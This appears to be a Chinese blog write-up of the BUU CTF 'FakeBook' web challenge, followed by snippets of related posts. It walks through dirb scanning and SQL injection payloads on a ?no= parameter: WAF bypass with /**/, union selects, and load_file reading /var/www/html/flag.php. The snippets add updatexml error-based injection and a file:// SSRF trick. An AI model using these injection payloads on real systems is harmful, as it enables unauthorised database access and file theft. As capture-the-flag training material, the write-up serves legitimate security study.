FakeBook BUU CTF WP

最新推荐文章于 2025-03-20 16:34:12 发布
原创 最新推荐文章于 2025-03-20 16:34:12 发布 · 688 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了一个利用SQL注入漏洞获取敏感信息的实际案例。通过dirb工具发现目标网站存在多个潜在入口,利用SQL注入技巧找到了数据库名及管理员权限信息,并最终通过读取文件功能获取了flag.php中的flag。

1.题干

 

 dirb一下,发现robots.txt和flag.php和/css和/js

打开flag.php啥都没有:

打开后注册,找到疑似SQL注入漏洞

PayLoad:?no=1%20order%20by%201#

order by 查询列数据。

尝试联合查询,被WAF捕捉。 

用 /**/过滤:PayLoad:?no=1%20union/**/select#

 进入无聊的联合查询:

联合查询:

 发现2存在注入点

查找数据库和数据表

Payload:?no=2 union++select 1,database(),3,4# &  ?no=2 union++select 1,user(),3,4#

发现是root权限(happy)

 且注意到路径(/var/www/html/view.php)

查出flag.php

Payload:?no=2%20union/**/select%201,load_file("/var/www/html/flag.php"),3,4#

找到flag.

提交:

 

 

【网络安全 | CTFfakebook(网鼎杯2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
BUUCTF Fakebook
venu_s的博客
03-24 387
Fakebook 1.题目 2.先随便注册一下,并查看网页源码,发现如下页面 3.判断注入点,发现?no=1存在注入 4.判断字段数,order by 长度为4(这里对空格进行了过滤,可以用++代替) ?no=0++order++by++4--+ 5.得到当前库名 ?no=0++union++select++1,database(),3,4--+ 6.得到表名 ?no=0++union...
CTF[网鼎杯]Fakebook
她叫常玉莹
08-25 767
robots中发现 user.php.bak文件 下载文件 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age;
wp-fakebook(攻防世界/buuctf)【多解法详解】
bin789456的博客
10-25 436
信息概览 题目本身大致有注册和登陆两个入口 注册并登陆后情况如下: 用扫描工具非常容易就能找到robots.txt (随便用一个都可) 找到备份 源码: <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name
[网鼎杯 2018]Fakebook -wp
freerats的博客
06-27 472
打开容器,发现页面里有注册页面和登入页面 任意注册一个用户名,进行登入 在blog处发现有xss,一开始研究了半天,然后卡住了,参考别人的wp才发现这道题跟xss没有半毛钱关系。。。 view.php?no=1 在这里是有注入点的 加个引号报错还会爆出绝对路径 发现union被过滤,但/**/union/**/可以绕过 列名 然后查看一下字段 查询到data发现这里面是以序列化的形式储存的 这道题的最关键还是是通过目录扫描发现有robots.txt,进而发现/user.php.bak 其实还可以跑出有f.
XCTF-fakebook
weixin_43821278的博客
03-12 747
XCTF-fakebook----做题萌新的记录思考上第一步:浏览所有环境第三步 敏感目录扫描第二步:找出漏洞所在下查看御剑的扫描结果那怎么利用SSRF呢??总结 萌新的记录 萌新记录一下这个题,个人感觉这个题比较有综合性。 思考 第一次总结一下WEB题思路,本次解题想法来自诸多大佬的博客。 上 第一步:浏览所有环境 浏览整个网站环境,发现有两个连接,login 和join。加上首页index,目前发现三个,然后F12分别查看index源码,没有发现什么线索。 然后有join和login,多半是自己创建账号
buuctf题目Fakebook
m0_65853019的博客
06-28 896
使用御剑扫描域名得到flag的位置,得到flag.php在服务器根目录下,从前面的报错内容上看服务器根目录为/var/www/html,所以构造的blog为file:///var/www/html/flag.php。则data字段的值为file:///var/www/html/flag.php序列化后的结果,又因为blog被限制为url形式,所以不能通过join方式。页面显示:有login和join两个按钮,join应该是注册,输入数据后老是提示blog is not valid,是数字型注入,验证得到。
BUU-CTF——WP(MISC[21~n])
hahaha233330的博客
10-06 1389
挑战BUU,贴一下网址:BUU-CTF MISC 继续~ 在线工具:Ook!、brainfuck转字符 21. FLAG 22. 另外一个世界 拖入010editor,拉到最后发现:01101011011011110110010101101011011010100011001101110011 二进制转字符串得到flag。 23. 假如给我三天光明 看最下面一排,感觉是盲文,去找盲文表对照即可得到密码kmdonowg。 解压后得到音频文件,拖入Audacity,猜测对应摩斯密码:-.-. - …-.
BUU-CTF——WP(Cryptp[1~30])
hahaha233330的博客
09-14 1635
好久没更新了,手生得很,重新练起来! 这次挑战BUU,贴一下网址:点我 Cryptp 1、MD5 直接把文本复制用url解码一下即可得到flag 2、Url编码 直接把文本复制用url解码一下即可得到flag。 3、看我回旋踢 文本为不规则排列,猜测是凯撒密码,用工具解密,多试几次得到以"flag"开头的排列。 4、一眼就解密 啊这 5、摩丝 摩斯电码解密得到,直接解码是全小写,但这道题正确flag为全大写。 6、签到 草 7、password 这题没什么意思,就是名字缩写+生日
BUU CTF [GUET-CTF2019]re1
sc111587的博客
11-25 282
6.之后编写python脚本,运行得到几行flag,一个一个试就行 最终答案为flag{e165421110ba03099a1c039337}1.下载文件解压出来 拖进exeinfo pe,可以得出这是一个64位文件,有upx壳。3.丢进ida中没有找到main函数 看到了correct,点进去查看。4.可以看到有一个if判断,点进去sub_4009AE查看。5.挺简单一段代码 但是要注意这里没有第七项,没有a[6]
BUU CTF ciscn_2019_n_1
最新发布
A_fish_like_sing的博客
03-20 2103
新手向对BUU CTF ciscn_2019_n_1该题的两种解法
BUU-CTF——WP(MISC[1~20])
hahaha233330的博客
09-11 1394
好久没更新了,手生得很,重新练起来! 这次挑战BUU,贴一下网址:BUU-CTF 一大堆在线工具:MD5 Url、base64、哈希/散列 凯撒、维吉尼亚、猪圈、摩斯 Cryptp 1、MD5 直接用在线工具解密即可得到flag。 ...
【web | CTF】攻防世界fakebook
weixin_46301214的博客
05-26 966
解题要点 【解题思路】 1)先进行CTF定点目录扫描 2)发现存在flag.php返回303数值 3)根据页面正常注册登录 4)在用户页面测试一下发现存在SQL注入 5)成功注入后,没在数据库里发现flag 6)检测此时数据库用户权限,发现是root 7)利用load_file()读取系统文件flag.php 【难点】 1)检测sql注入是被如何过滤了 2...
buuctf-Fakebook(报错注入)
m0_62094846的博客
04-04 2504
blog要有http:// 可以尝试sql注入,但是我用sqlmap注入不了,不知道为什么 然后尝试手工,试过很多闭合方式都不行,后来发现直接就是整型注入 正确的情况不会有回显,错误会有,试试报错注入 这里有个之前没见过的过滤方式,过滤了0x7e,要用~(本来以为过滤了updatexml,想用另一个来着) 查当前数据库 ?no=1 and updatexml(1,concat('~',(database()),'~'),1)# 查所有数据库 ?no=1 and...
BUUUCTF刷题记录 Fakebook
m0_46576074的博客
05-17 323
[网鼎杯 2018]Fakebook 进入页面 查表 view.php?no=1 and updatexml(1,make_set(3,’~’,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)# 查列 view.php?no=1 and updatexml(1,make_set(3,’~’,(select group_concat(column_name)
BUUCTF[网鼎杯2018]Fakebook
weixin_45253622的博客
05-22 816
我们注册一个账号看看: 注册成功如下: 这里需要注意,王小帥是可以点击的,url变为:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1我们试试sql注入; payload:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1' 没什么卵用,我们访问ro...
攻防世界:fakebook
qq_46230755的博客
01-10 376
打开后注册一个账户,进入个人主页 发现上面存在注入点,先试一下改点数字 发现存在报错 尝试输入 view.php?no=1 and 1=1# view.php?no=1 and 1=2# 第一个显示正常,第二个报错,确定存在注入 开始注入的测试,第一步查 存在的字段,利用order by联合查询,发现5不存在,所以应该为4位字段数。 view.php?no=1 order by 5# 接着利用联合查询语句想找哪个字段可以回显利用,为了不让我们构造的select语句与原来语句的结果混在一起,将原
BUUCTF——[网鼎杯 2018]Fakebook
Ho1aAs‘s Blog
05-24 610
文章目录利用点解题无 利用点 SQL注入 SSRF读文件 解题 打开环境,没有任何提示,先试试基础功能,注册一个号,回到主页可以点进去看记录 发现URL是拼接上序号的,试试SQL注入,发现是字符型闭合单引号的注入 先看看字段数 无 ...
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.youkuaiyun.com/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值